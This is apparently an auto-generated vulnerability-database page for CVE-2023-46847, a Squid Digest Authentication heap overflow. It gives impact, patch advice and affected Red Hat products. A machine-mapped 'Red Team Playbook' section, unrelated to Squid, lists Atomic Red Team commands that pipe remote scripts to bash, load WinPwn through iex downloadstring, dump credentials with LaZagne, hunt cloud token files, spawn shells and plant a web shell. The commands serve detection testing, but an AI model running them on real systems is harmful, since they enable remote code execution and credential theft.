CVE-2023-46847
Overview
This vulnerability is a heap-based buffer overflow arising from improper handling of HTTP Digest Authentication data in Squid. The root cause is the lack of bounds checking when writing authentication-related input, allowing up to 2 MB of arbitrary data to be written to heap memory. The affected component is the HTTP Digest Authentication processing module within Squid's HTTP proxy functionality.
Vulnerability Description
Squid is vulnerable to a Denial of Service, where a remote attacker can perform buffer overflow attack by writing up to 2 MB of arbitrary data to heap memory when Squid is configured to accept HTTP Digest Authentication.
Impact
An unauthenticated remote attacker can exploit this vulnerability to cause a denial of service by crashing the Squid process through heap corruption. The attack requires network access to the Squid proxy configured with HTTP Digest Authentication but no user interaction or privileges are necessary. The CVSS vector indicates low attack complexity and no required privileges (AV:N/AC:L/PR:N/UI:N), enabling straightforward exploitation. The resulting service disruption can impact business continuity by interrupting proxy services and dependent network operations.
Solution
Red Hat has issued multiple advisories (RHSA-2023:6266, RHSA-2023:6267, RHSA-2023:6268, RHSA-2023:6748, RHSA-2023:6801) addressing this issue in their Enterprise Linux 8 and 9 distributions. Users should apply the corresponding security updates to Squid packages as detailed in these advisories. The official Squid security advisory (GHSA-phqj-m8gv-cq4g) also provides patch information. Applying the vendor-supplied patches is the recommended remediation; no alternative workarounds are documented in the advisories.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Squid, a widely used caching proxy server, poses a significant risk due to its susceptibility to a Denial of Service (DoS) attack. This issue arises when the server is configured to accept HTTP Digest Authentication, allowing a remote attacker to exploit a buffer overflow condition. By sending up to 2 MB of arbitrary data to the heap memory, an attacker can manipulate the server's memory allocation, potentially leading to unexpected behavior, crashes, or service interruptions. The nature of this vulnerability lies in the mishandling of input data, which can be crafted to exceed the allocated buffer size, resulting in memory corruption.
Attack vectors for this vulnerability are primarily remote, as an attacker only needs network access to the server to initiate the exploit. The exploitation scenario is straightforward: an attacker could craft a malicious HTTP request that includes oversized authentication headers. Once the server processes this request, the overflow can occur, leading to a crash or unresponsive state. This attack can be executed with minimal effort, making it particularly concerning for organizations that rely on Squid for web traffic management. The potential for automated scripts to exploit this vulnerability further amplifies the risk, as attackers can launch mass attacks against multiple servers without significant manual intervention.
The real-world impact of this vulnerability can be severe, especially for businesses that depend on uninterrupted web services. A successful attack could lead to prolonged downtime, affecting customer access to services and potentially resulting in financial losses. Moreover, the reputational damage from service outages can undermine customer trust and loyalty. Organizations that utilize Squid in mission-critical environments, such as e-commerce platforms, financial institutions, or cloud services, face heightened risks. The cascading effects of a DoS attack can disrupt not only the affected service but also impact related services and infrastructure, leading to broader operational challenges.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching the Squid server is essential to protect against known vulnerabilities. Implementing intrusion detection systems (IDS) can help identify unusual traffic patterns indicative of an ongoing attack. Additionally, network segmentation can limit the exposure of critical systems to potential threats. Organizations should also consider employing rate limiting and request validation mechanisms to prevent oversized requests from reaching the server. Conducting regular security assessments and penetration testing can further enhance an organization's resilience against such vulnerabilities.
In conclusion, the vulnerability in Squid presents a significant threat that requires immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against this and similar vulnerabilities. Implementing robust detection and mitigation strategies will not only protect the integrity of their services but also safeguard their reputation and customer trust in an increasingly hostile digital landscape.
Affected Products (21)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 8.0 |
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 9.0 |
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 8.8 |
cpe:2.3:o:redhat:enterprise_linux_eus:8.8:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 9.0 |
cpe:2.3:o:redhat:enterprise_linux_eus:9.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 9.2 |
cpe:2.3:o:redhat:enterprise_linux_eus:9.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux For Arm 64 | 8.0_aarch64 |
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:8.0_aarch64:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux For Ibm Z Systems | 8.0_s390x |
cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0_s390x:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux For Power Little Endian | 8.0_ppc64le |
cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server | 7.0 |
cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 8.2 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 9.2 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:9.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.2 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.8 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.8:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 9.2 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:9.2:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (20)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-46847 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6266 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6267 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6268 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6748 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6801 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6803 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6804 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6805 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6810 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6882 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6884 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:7213 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:7576 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:7578 |
| access.redhat.com |
GitHub CVE
vdb-entry
x_refsource_REDHAT
|
https://access.redhat.com/security/cve/CVE-2023-46847 |
| bugzilla.redhat.com |
GitHub CVE
issue-tracking
x_refsource_REDHAT
|
https://bugzilla.redhat.com/show_bug.cgi?id=2245916 |
| github.com |
GitHub CVE
|
https://github.com/squid-cache/squid/security/advisories/GHSA-phqj-m8gv-cq4g |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2024/01/msg00003.html |
| security.netapp.com |
NVD API
|
https://security.netapp.com/advisory/ntap-20231130-0002/ |